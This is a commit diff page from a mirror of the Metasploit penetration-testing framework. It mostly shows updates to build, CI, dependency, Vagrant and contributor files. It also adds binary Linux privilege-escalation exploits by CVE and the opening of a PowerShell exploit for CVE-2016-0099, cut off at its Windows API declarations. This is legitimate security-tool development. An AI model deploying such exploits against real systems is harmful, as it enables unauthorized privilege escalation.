infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Bring #6638 up to date

bug/bundler_fix
wchen-r7 2016-11-15 12:27:05 -06:00
parent fce78dce44 f50e609d12
commit 7b83720b90
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
4218 changed files with 58394 additions and 75896 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
.github/ISSUE_TEMPLATE.md vendored Normal file
View File

@ -0,0 +1,41 @@
## Steps to reproduce
How'd you do it?
1. ...
2. ...
This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
## Expected behavior
What should happen?
## Current behavior
What happens instead?
You might also want to check the last ~1k lines of
`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
`~/.msf4/logs/framework.log` for relevant stack traces
## System stuff
### Metasploit version
Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).
### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)
### OS
What OS are you running Metasploit on?

14
.github/PULL_REQUEST_TEMPLATE.md vendored Normal file
View File

@ -0,0 +1,14 @@
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.
## Verification
List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not

1
.gitignore vendored
View File

@ -84,3 +84,4 @@ data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
/metakitty
.vagrant

23
.mailmap
View File

@ -1,8 +1,11 @@
acammack-r7 <acammack-r7@github> Adam Cammack <Adam_Cammack@rapid7.com>
bcook-r7 <bcook-r7@github> <busterb@gmail.com>
bcook-r7 <bcook-r7@github> Brent Cook <bcook@rapid7.com>
bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
bpatterson-r7 <bpatterson-r7@github> Brian Patterson <Brian_Patterson@rapid7.com>
bpatterson-r7 <bpatterson-r7@github> bpatterson-r7 <Brian_Patterson@rapid7.com>
bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
bwatters-r7 <bwatters-r7@github> Brendan <bwatters@rapid7.com>
bwatters-r7 <bwatters-r7@github> Brendan Watters <bwatters@rapid7.com>
cdoughty-r7 <cdoughty-r7@github> Chris Doughty <chris_doughty@rapid7.com>
dheiland-r7 <dheiland-r7@github> Deral Heiland <dh@layereddefense.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com>
@ -16,30 +19,40 @@ ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
gmikeska-r7 <gmikeska-r7@github> Greg Mikeska <greg_mikeska@rapid7.com>
gmikeska-r7 <gmikeska-r7@github> Gregory Mikeska <greg_mikeska@rapid7.com>
jbarnett-r7 <jbarnett-r7@github> James Barnett <James_Barnett@rapid7.com>
jhart-r7 <jhart-r7@github> Jon Hart <jon_hart@rapid7.com>
jlee-r7 <jlee-r7@github> <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> <james_lee@rapid7.com>
kgray-r7 <kgray-r7@github> Kyle Gray <kyle_gray@rapid7.com>
khayes-r7 <khayes-r7@github> l0gan <Kirk_Hayes@rapid7.com>
lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance.sanchez+github@gmail.com>
lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance.sanchez@rapid7.com>
lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance@AUS-MAC-1041.local>
lsanchez-r7 <lsanchez-r7@github> Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com>
lsanchez-r7 <lsanchez-r7@github> darkbushido <lance.sanchez@gmail.com>
lsato-r7 <lsato-r7@github> Louis Sato <lsato@rapid7.com>
pbarry-r7 <pbarry-r7@github> Pearce Barry <pearce_barry@rapid7.com>
pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com>
pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com>
sdavis-r7 <sdavis-r7@github> Scott Davis <Scott_Davis@rapid7.com>
sdavis-r7 <sdavis-r7@github> Scott Lee Davis <scott_davis@rapid7.com>
sdavis-r7 <sdavis-r7@github> Scott Lee Davis <sdavis@rapid7.com>
sgonzalez-r7 <sgonzalez-r7@github> Sonny Gonzalez <sgonzalez@rapid7.com>
sgonzalez-r7 <sgonzalez-r7@github> Sonny Gonzalez <sonny_gonzalez@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tdoan-r7 <tdoan-r7@github> tdoan-r7 <thao_doan@rapid7.com>
tdoan-r7 <tdoan-r7@github> thao doan <thao_doan@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
wchen-r7 <wchen-r7@github> <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> <wei_chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@cs.nmt.edu>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
wvu-r7 <wvu-r7@github> wvu-r7 <William_Vu@rapid7.com>
wwebb-r7 <wwebb-r7@github> William Webb <William_Webb@rapid7.com>
wwebb-r7 <wwebb-r7@github> wwebb-r7 <William_Webb@rapid7.com>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@ -114,6 +127,7 @@ m-1-k-3 <m-1-k-3@github> Michael Messner <devnull@s3cur1ty.de>
Meatballs1 <Meatballs1@github> <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> <Meatballs1@users.noreply.github.com>
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
net-ninja <net-ninja@github.com> Steven Seeley <steventhomasseeley@gmail.com>
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
@ -150,10 +164,11 @@ void-in <void-in@github> void_in <root@localhost.localdomain>
void-in <void-in@github> Waqas Ali <waqas.bsquare@gmail.com>
zeroSteiner <zeroSteiner@github> Spencer McIntyre <zeroSteiner@gmail.com>
# Aliases for utility author names. Since they're fake, typos abound
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Metasploit Bot <metasploit@rapid7.com> Metasploit <metasploit@rapid7.com>
Jenkins Bot <jenkins@rapid7.com> Jenkins <jenkins@rapid7.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>

2
.ruby-version
View File

@ -1 +1 @@
2.1.8
2.3.1

22
.travis.yml
View File

@ -1,11 +1,22 @@
sudo: false
group: stable
bundler_args: --without coverage development pcap
cache: bundler
addons:
postgresql: '9.3'
apt:
packages:
- libpcap-dev
- graphviz
language: ruby
rvm:
- '2.3.1'
env:
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
- RAKE_TASKS=spec SPEC_OPTS="--tag content"
- RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
language: ruby
matrix:
fast_finish: true
before_install:
@ -23,9 +34,6 @@ before_script:
script:
# fail build if db/schema.rb update is not committed
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
sudo: false
rvm:
- '2.1.8'
notifications:
irc: "irc.freenode.org#msfnotify"
@ -38,9 +46,3 @@ branches:
except:
- gh-pages
- metakitty
addons:
postgresql: '9.3'
apt:
packages:
- libpcap-dev

8
CONTRIBUTING.md
View File

@ -45,6 +45,8 @@ and Metasploit's [Common Coding Mistakes].
* **Do** specify a descriptive title to make searching for your pull request easier.
* **Do** include [console output], especially for witnessable effects in `msfconsole`.
* **Do** list [verification steps] so your code is testable.
* **Do** [reference associated issues] in your pull request description
* **Do** write [release notes] once a pull request is landed
* **Don't** leave your pull request description blank.
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
@ -56,6 +58,10 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
- It would be even better to set up `msftidy.rb` as a [pre-commit hook].
* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
* **Don't** include more than one module per pull request.
* **Do** include instructions on how to setup the vulnerable environment or software
* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs
#### Scripts
@ -102,6 +108,8 @@ already way ahead of the curve, so keep it up!
[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb

11
Gemfile
View File

@ -18,18 +18,21 @@ group :development do
gem 'yard'
# for development and testing purposes
gem 'pry'
# module documentation
gem 'octokit', '~> 4.0'
# rails-upgrade staging gems
end
group :development, :test do
# automatically include factories from spec/factories
gem 'factory_girl_rails', '~> 4.5.0'
gem 'factory_girl_rails'
# Make rspec output shorter and more useful
gem 'fivemat', '~> 1.3.1'
gem 'fivemat'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
gem 'rake'
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
# environment is development
gem 'rspec-rails' , '~> 3.3'
gem 'rspec-rails'
end
group :test do

406
Gemfile.lock
View File

@ -1,233 +1,332 @@
PATH
remote: .
specs:
metasploit-framework (4.11.14)
actionpack (>= 4.0.9, < 4.1.0)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
metasploit-framework (4.12.42)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
bcrypt
bit-struct
filesize
jsobfu (~> 0.4.1)
jsobfu
json
metasm (~> 1.0.2)
metasploit-concern (= 1.0.0)
metasploit-credential (= 1.0.1)
metasploit-model (= 1.0.0)
metasploit-payloads (= 1.1.2)
metasploit_data_models (= 1.2.11)
metasm
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.1.29)
metasploit_data_models
metasploit_payloads-mettle (= 0.0.8)
msgpack
network_interface (~> 0.0.1)
nessus_rest
net-ssh
network_interface
nokogiri
openssl-ccm (= 1.2.1)
packetfu (= 1.1.11)
octokit
openssl-ccm
openvas-omp
packetfu
patch_finder
pcaprub
pg (>= 0.11)
pg
railties
rb-readline-r7
recog (= 2.0.14)
recog
redcarpet
rex-arch
rex-bin_tools
rex-core
rex-encoder
rex-exploitation
rex-java
rex-mime
rex-nop
rex-ole
rex-powershell
rex-random_identifier
rex-registry
rex-rop_builder
rex-socket
rex-sslscan
rex-struct2
rex-text
rex-zip
robots
rubyzip (~> 1.1)
rubyntlm
rubyzip
sqlite3
sshkey
tzinfo
tzinfo-data
windows_error
GEM
remote: https://rubygems.org/
specs:
actionmailer (4.0.13)
actionpack (= 4.0.13)
mail (~> 2.5, >= 2.5.4)
actionpack (4.0.13)
activesupport (= 4.0.13)
builder (~> 3.1.0)
erubis (~> 2.7.0)
rack (~> 1.5.2)
actionpack (4.2.7.1)
actionview (= 4.2.7.1)
activesupport (= 4.2.7.1)
rack (~> 1.6)
rack-test (~> 0.6.2)
activemodel (4.0.13)
activesupport (= 4.0.13)
builder (~> 3.1.0)
activerecord (4.0.13)
activemodel (= 4.0.13)
activerecord-deprecated_finders (~> 1.0.2)
activesupport (= 4.0.13)
arel (~> 4.0.0)
activerecord-deprecated_finders (1.0.4)
activesupport (4.0.13)
i18n (~> 0.6, >= 0.6.9)
minitest (~> 4.2)
multi_json (~> 1.3)
thread_safe (~> 0.1)
tzinfo (~> 0.3.37)
arel (4.0.2)
arel-helpers (2.2.0)
activerecord (>= 3.1.0, < 5)
aruba (0.6.2)
childprocess (>= 0.3.6)
cucumber (>= 1.1.1)
rspec-expectations (>= 2.7.0)
bcrypt (3.1.10)
builder (3.1.4)
capybara (2.4.4)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.7.1)
activesupport (= 4.2.7.1)
builder (~> 3.1)
erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
activemodel (4.2.7.1)
activesupport (= 4.2.7.1)
builder (~> 3.1)
activerecord (4.2.7.1)
activemodel (= 4.2.7.1)
activesupport (= 4.2.7.1)
arel (~> 6.0)
activesupport (4.2.7.1)
i18n (~> 0.7)
json (~> 1.7, >= 1.7.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.0)
public_suffix (~> 2.0, >= 2.0.2)
arel (6.0.3)
arel-helpers (2.3.0)
activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
contracts (~> 0.9)
cucumber (>= 1.3.19)
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
bcrypt (3.1.11)
bit-struct (0.15.0)
builder (3.2.2)
capybara (2.10.1)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.5)
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.0)
cucumber (1.3.19)
coderay (1.1.1)
contracts (0.14.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
cucumber-wire (~> 0.0.1)
diff-lcs (>= 1.1.3)
gherkin (~> 2.12)
gherkin (~> 4.0)
multi_json (>= 1.7.5, < 2.0)
multi_test (>= 0.1.2)
cucumber-rails (1.4.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.4.5)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 2)
mime-types (>= 1.16, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.16, < 4)
nokogiri (~> 1.5)
rails (>= 3, < 5)
railties (>= 3, < 5.1)
cucumber-wire (0.0.1)
diff-lcs (1.2.5)
docile (1.1.5)
erubis (2.7.0)
factory_girl (4.5.0)
factory_girl (4.7.0)
activesupport (>= 3.0.0)
factory_girl_rails (4.5.0)
factory_girl (~> 4.5.0)
factory_girl_rails (4.7.0)
factory_girl (~> 4.7.0)
railties (>= 3.0.0)
ffi (1.9.8)
faraday (0.9.2)
multipart-post (>= 1.2, < 3)
ffi (1.9.14)
filesize (0.1.1)
fivemat (1.3.2)
gherkin (2.12.2)
multi_json (~> 1.3)
hike (1.2.3)
gherkin (4.0.0)
i18n (0.7.0)
jsobfu (0.4.1)
rkelly-remix (= 0.0.6)
json (1.8.3)
mail (2.6.3)
mime-types (>= 1.16, < 3)
loofah (2.0.3)
nokogiri (>= 1.5.9)
metasm (1.0.2)
metasploit-concern (1.0.0)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-credential (1.0.1)
metasploit-concern (~> 1.0)
metasploit-model (~> 1.0)
metasploit_data_models (~> 1.0)
metasploit-concern (2.0.1)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.5)
metasploit-concern
metasploit-model
metasploit_data_models
pg
railties
rubyntlm
rubyzip (~> 1.1)
metasploit-model (1.0.0)
activemodel (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.1.2)
metasploit_data_models (1.2.11)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
rubyzip
metasploit-model (2.0.0)
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.1.29)
metasploit_data_models (2.0.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
arel-helpers
metasploit-concern (~> 1.0)
metasploit-model (~> 1.0)
metasploit-concern
metasploit-model
pg
postgres_ext
railties (>= 4.0.9, < 4.1.0)
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.0.8)
method_source (0.8.2)
mime-types (2.6.1)
mini_portile2 (2.0.0)
minitest (4.7.5)
msgpack (0.7.4)
multi_json (1.11.2)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
mini_portile2 (2.1.0)
minitest (5.9.1)
msgpack (1.0.2)
multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (3.2.0)
network_interface (0.0.1)
nokogiri (1.6.7.2)
mini_portile2 (~> 2.0.0.rc2)
nokogiri (1.6.8.1)
mini_portile2 (~> 2.1.0)
octokit (4.6.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
packetfu (1.1.11)
network_interface (~> 0.0)
pcaprub (~> 0.12)
pcaprub (0.12.1)
pg (0.18.4)
patch_finder (1.0.2)
pcaprub (0.12.4)
pg (0.19.0)
pg_array_parser (0.0.9)
postgres_ext (3.0.0)
activerecord (>= 4.0.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
pry (0.10.1)
pry (0.10.4)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
rack (1.5.5)
public_suffix (2.0.4)
rack (1.6.5)
rack-test (0.6.3)
rack (>= 1.0)
rails (4.0.13)
actionmailer (= 4.0.13)
actionpack (= 4.0.13)
activerecord (= 4.0.13)
activesupport (= 4.0.13)
bundler (>= 1.3.0, < 2.0)
railties (= 4.0.13)
sprockets-rails (~> 2.0)
railties (4.0.13)
actionpack (= 4.0.13)
activesupport (= 4.0.13)
rails-deprecated_sanitizer (1.0.3)
activesupport (>= 4.2.0.alpha)
rails-dom-testing (1.0.7)
activesupport (>= 4.2.0.beta, < 5.0)
nokogiri (~> 1.6.0)
rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.3)
loofah (~> 2.0)
railties (4.2.7.1)
actionpack (= 4.2.7.1)
activesupport (= 4.2.7.1)
rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0)
rake (10.4.2)
rake (11.3.0)
rb-readline-r7 (0.5.2.0)
recog (2.0.14)
recog (2.0.24)
nokogiri
redcarpet (3.3.4)
rex-arch (0.1.2)
rex-text
rex-bin_tools (0.1.1)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.2)
rex-encoder (0.1.0)
metasm
rex-arch
rex-text
rex-exploitation (0.1.2)
jsobfu
metasm
rex-arch
rex-encoder
rex-text
rex-java (0.1.2)
rex-mime (0.1.1)
rex-text
rex-nop (0.1.0)
rex-arch
rex-ole (0.1.2)
rex-text
rex-powershell (0.1.66)
rex-random_identifier
rex-text
rex-random_identifier (0.1.0)
rex-text
rex-registry (0.1.0)
rex-rop_builder (0.1.0)
metasm
rex-core
rex-text
rex-socket (0.1.0)
rex-core
rex-sslscan (0.1.0)
rex-socket
rex-text
rex-struct2 (0.1.0)
rex-text (0.2.5)
rex-zip (0.1.0)
rex-text
rkelly-remix (0.0.6)
robots (0.10.1)
rspec-core (3.3.2)
rspec-support (~> 3.3.0)
rspec-expectations (3.3.1)
rspec-core (3.5.4)
rspec-support (~> 3.5.0)
rspec-expectations (3.5.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.3.0)
rspec-mocks (3.3.2)
rspec-support (~> 3.5.0)
rspec-mocks (3.5.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.3.0)
rspec-rails (3.3.3)
actionpack (>= 3.0, < 4.3)
activesupport (>= 3.0, < 4.3)
railties (>= 3.0, < 4.3)
rspec-core (~> 3.3.0)
rspec-expectations (~> 3.3.0)
rspec-mocks (~> 3.3.0)
rspec-support (~> 3.3.0)
rspec-support (3.3.0)
rubyntlm (0.6.0)
rubyzip (1.2.0)
shoulda-matchers (2.8.0)
activesupport (>= 3.0.0)
simplecov (0.9.2)
docile (~> 1.1.0)
multi_json (~> 1.0)
simplecov-html (~> 0.9.0)
simplecov-html (0.9.0)
slop (3.6.0)
sprockets (2.12.3)
hike (~> 1.2)
multi_json (~> 1.0)
rack (~> 1.0)
tilt (~> 1.1, != 1.3.0)
sprockets-rails (2.2.4)
rspec-support (~> 3.5.0)
rspec-rails (3.5.2)
actionpack (>= 3.0)
activesupport (>= 3.0)
sprockets (>= 2.8, < 4.0)
sqlite3 (1.3.11)
railties (>= 3.0)
rspec-core (~> 3.5.0)
rspec-expectations (~> 3.5.0)
rspec-mocks (~> 3.5.0)
rspec-support (~> 3.5.0)
rspec-support (3.5.0)
rubyntlm (0.6.1)
rubyzip (1.2.0)
sawyer (0.8.0)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 0.10)
shoulda-matchers (3.1.1)
activesupport (>= 4.0.0)
simplecov (0.12.0)
docile (~> 1.1.0)
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.0)
slop (3.6.0)
sqlite3 (1.3.12)
sshkey (1.8.0)
thor (0.19.1)
thread_safe (0.3.5)
tilt (1.4.1)
timecop (0.7.3)
tzinfo (0.3.45)
timecop (0.8.1)
tzinfo (1.2.2)
thread_safe (~> 0.1)
tzinfo-data (1.2016.9)
tzinfo (>= 1.0.0)
windows_error (0.0.2)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.8.7.6)
yard (0.9.5)
PLATFORMS
ruby
@ -235,17 +334,18 @@ PLATFORMS
DEPENDENCIES
aruba
cucumber-rails
factory_girl_rails (~> 4.5.0)
fivemat (~> 1.3.1)
factory_girl_rails
fivemat
metasploit-framework!
octokit (~> 4.0)
pry
rake (>= 10.0.0)
rake
redcarpet
rspec-rails (~> 3.3)
rspec-rails
shoulda-matchers
simplecov
timecop
yard
BUNDLED WITH
1.11.2
1.13.6

50
Vagrantfile vendored Normal file
View File

@ -0,0 +1,50 @@
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure(2) do |config|
config.ssh.forward_x11 = true
config.vm.box = "ubuntu/trusty64"
# TODO: find a minimal image that keeps up-to-date and
# supports multiple providers
#config.vm.box = "phusion/ubuntu-14.04-amd64"
config.vm.network :forwarded_port, guest: 4444, host: 4444
config.vm.provider "vmware" do |v|
v.memory = 2048
v.cpus = 2
end
config.vm.provider "virtualbox" do |v|
v.memory = 2048
v.cpus = 2
end
%w(.vimrc .gitconfig).each do |f|
local = File.expand_path "~/#{f}"
if File.exist? local
config.vm.provision "file", source: local, destination: f
end
end
[ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
"apt-get update",
"apt-get dist-upgrade -y",
"apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
].each do |step|
config.vm.provision "shell", inline: step
end
[ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
"curl -L https://get.rvm.io | bash -s stable",
"source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
"source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
"source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
"mkdir -p ~/.msf4",
].each do |step|
config.vm.provision "shell", privileged: false, inline: step
end
config.vm.provision "file", source: "config/database.yml.vagrant", destination: "~/.msf4/database.yml"
config.vm.provision "shell", inline: "sudo -u postgres psql postgres -tAc \"SELECT 1 FROM pg_roles WHERE rolname='vagrant'\" | grep -q 1 || sudo -u postgres createuser -s -e -w vagrant && sudo -u postgres psql -c \"ALTER USER vagrant with ENCRYPTED PASSWORD 'vagrant';\""
["msf_dev_db", "msf_test_db"].each do |database|
config.vm.provision "shell", inline: "sudo -u postgres psql -lqt | awk '{ print $1 }' | grep -w #{database} | wc -l | grep -q 1 || sudo -u postgres createdb --owner vagrant #{database}"
end
end

82
app/concerns/mdm/workspace/boundary_range.rb Normal file
View File

@ -0,0 +1,82 @@
module Mdm::Workspace::BoundaryRange
extend ActiveSupport::Concern
included do
#
# Validations
#
validate :boundary_must_be_ip_range
#
# Instance Methods
#
# If {#limit_to_network} is disabled, this will always return `true`.
# Otherwise, return `true` only if all of the given IPs are within the
# project {#boundary boundaries}.
#
# @param ips [String] IP range(s)
# @return [true] if actions on ips are allowed.
# @return [false] if actions are not allowed on ips.
def allow_actions_on?(ips)
return true unless limit_to_network
return true unless boundary
return true if boundary.empty?
boundaries = Shellwords.split(boundary)
return true if boundaries.empty? # It's okay if there is no boundary range after all
given_range = Rex::Socket::RangeWalker.new(ips)
return false unless given_range # Can't do things to nonexistant IPs
allowed = false
boundaries.each do |boundary_range|
ok_range = Rex::Socket::RangeWalker.new(boundary)
allowed = true if ok_range.include_range? given_range
end
return allowed
end
# Validates that {#boundary} is {#valid_ip_or_range? a valid IP address or
# IP address range}. Due to this not being tested before it was moved here
# from Mdm, the default workspace does not validate. We always validate boundaries
# and a workspace may have a blank default boundary.
#
# @return [void]
def boundary_must_be_ip_range
unless boundary.blank?
begin
boundaries = Shellwords.split(boundary)
rescue ArgumentError
boundaries = []
end
boundaries.each do |range|
unless valid_ip_or_range?(range)
errors.add(:boundary, "must be a valid IP range")
end
end
end
end
# Returns an array of addresses ranges
#
# @return [Array<String>]
def addresses
(boundary || "").split("\n")
end
private
# Returns whether `string` is a valid IP address or IP address range.
#
# @return [true] if valid IP address or IP address range.
# @return [false] otherwise.
def valid_ip_or_range?(string)
range = Rex::Socket::RangeWalker.new(string)
range && range.ranges && range.ranges.any?
end
end
end

18
config/database.yml.vagrant Normal file
View File

@ -0,0 +1,18 @@
development: &pgsql
adapter: postgresql
database: msf_dev_db
username: vagrant
password: vagrant
host: localhost
port: 5432
pool: 200
timeout: 5
production: &production
<<: *pgsql
test:
<<: *pgsql
database: msf_test_db
username: vagrant
wassword: vagrant

5
config/environments/production.rb Normal file
View File

@ -0,0 +1,5 @@
if defined? Metasploit::Framework::Application
Metasploit::Framework::Application.configure do
config.log_level = :info
end
end

BIN
data/exploits/CVE-2014-0038/recvmmsg Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2015-1328/1328 Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2015-1328/ofs-lib.so Normal file
View File

Binary file not shown.

BIN
data/exploits/CVE-2015-8660/8660 Normal file
View File

Binary file not shown.

347
data/exploits/CVE-2016-0099/cve_2016_0099.ps1 Executable file
View File

@ -0,0 +1,347 @@
# Copyright (c) 2016, Ruben Booren (@FuzzySec)
# All rights reserved
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
public struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct SQOS
{
public int Length;
public int ImpersonationLevel;
public int ContextTrackingMode;
public bool EffectiveOnly;
}
public static class Advapi32
{
[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
public static extern bool CreateProcessWithLogonW(
String userName,
String domain,
String password,
int logonFlags,
String applicationName,
String commandLine,
int creationFlags,
int environment,
String currentDirectory,
ref STARTUPINFO startupInfo,
out PROCESS_INFORMATION processInformation);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool SetThreadToken(
ref IntPtr Thread,
IntPtr Token);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenThreadToken(
IntPtr ThreadHandle,
int DesiredAccess,
bool OpenAsSelf,
out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenProcessToken(
